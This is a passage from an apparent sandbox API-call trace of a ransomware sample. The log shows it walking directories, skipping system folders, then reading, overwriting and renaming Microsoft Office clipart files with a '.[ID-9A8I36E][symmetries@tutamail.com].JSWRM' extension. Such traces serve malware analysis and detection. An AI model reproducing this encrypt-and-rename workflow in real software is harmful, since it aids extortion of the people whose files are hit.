hHeap=0x1e0000) returned 1 [0091.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0091.312] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0091.312] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5380be, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf5380be, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf5380be, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x864, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00330_.WMF", cAlternateFileName="")) returned 1 [0091.312] lstrcmpiW (lpString1="NA00330_.WMF", lpString2=".") returned 1 [0091.312] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="..") returned 1 [0091.312] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="...") returned 1 [0091.312] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="windows") returned -1 [0091.312] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="recovery") returned -1 [0091.313] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="perflogs") returned -1 [0091.313] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="documents and settings") returned 1 [0091.313] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.313] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="system volume information") returned -1 [0091.313] lstrcmpiW (lpString1="NA00330_.WMF", lpString2="msocache") returned 1 [0091.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0091.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00330_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00330_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00330_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0091.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0091.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00330_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00330_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00330_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0091.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0091.313] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0091.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.313] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.313] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.344] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2148) returned 1 [0091.344] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x860) returned 0x20c6c0 [0091.344] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x860, lpOverlapped=0x0) returned 1 [0091.347] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.348] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x860, lpOverlapped=0x0) returned 1 [0091.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0091.348] CloseHandle (hObject=0x314) returned 1 [0091.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0091.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0091.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0091.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0091.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0091.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0091.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0091.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0091.348] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.348] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00330_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00330_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0091.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0091.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.349] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf58455c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf58455c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf58455c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1172, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00388_.WMF", cAlternateFileName="")) returned 1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2=".") returned 1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="..") returned 1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="...") returned 1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="windows") returned -1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="recovery") returned -1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="perflogs") returned -1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="documents and settings") returned 1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="system volume information") returned -1 [0091.349] lstrcmpiW (lpString1="NA00388_.WMF", lpString2="msocache") returned 1 [0091.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0091.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00388_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00388_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00388_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0091.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0091.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00388_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00388_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00388_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0091.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0091.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0091.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0091.350] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.351] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4466) returned 1 [0091.351] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1170) returned 0x205850 [0091.351] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1170, lpOverlapped=0x0) returned 1 [0091.353] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.353] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1170, lpOverlapped=0x0) returned 1 [0091.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.353] CloseHandle (hObject=0x314) returned 1 [0091.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0091.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0091.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0091.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0091.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0091.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0091.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0091.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0091.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0091.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0091.353] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00388_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00388_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0091.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0091.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0091.354] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20ca, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00389_.WMF", cAlternateFileName="")) returned 1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2=".") returned 1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="..") returned 1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="...") returned 1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="windows") returned -1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="recovery") returned -1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="perflogs") returned -1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="documents and settings") returned 1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="system volume information") returned -1 [0091.354] lstrcmpiW (lpString1="NA00389_.WMF", lpString2="msocache") returned 1 [0091.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0091.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00389_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00389_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00389_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0091.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0091.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00389_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00389_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NA00389_.WMF", lpUsedDefaultChar=0x0) returned 12 [0091.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0091.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0091.355] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0091.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0091.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0091.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0091.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0091.356] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8394) returned 1 [0091.356] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.356] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20c0) returned 0x205850 [0091.356] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x20c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x20c0, lpOverlapped=0x0) returned 1 [0091.358] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0091.358] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x20c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x20c0, lpOverlapped=0x0) returned 1 [0091.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0091.358] CloseHandle (hObject=0x314) returned 1 [0091.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0091.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0091.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0091.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0091.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0091.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0091.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0091.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0091.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0091.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0091.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0091.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0091.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0091.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0091.359] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA00389_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na00389_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0091.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0091.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0091.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0091.360] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf55e30d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf55e30d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf55e30d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x21c2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="NA00390_.WMF", cAlternateFileName="")) returned 1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2=".") returned 1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="..") returned 1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="...") returned 1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="windows") returned -1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="recovery") returned -1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="perflogs") returned -1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="documents and settings") returned 1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="system volume information") returned -1 [0091.360] lstrcmpiW (lpString1="NA00390_.WMF", lpString2="msocache") returned 1 [0091.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0091.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00390_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NA00390_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, 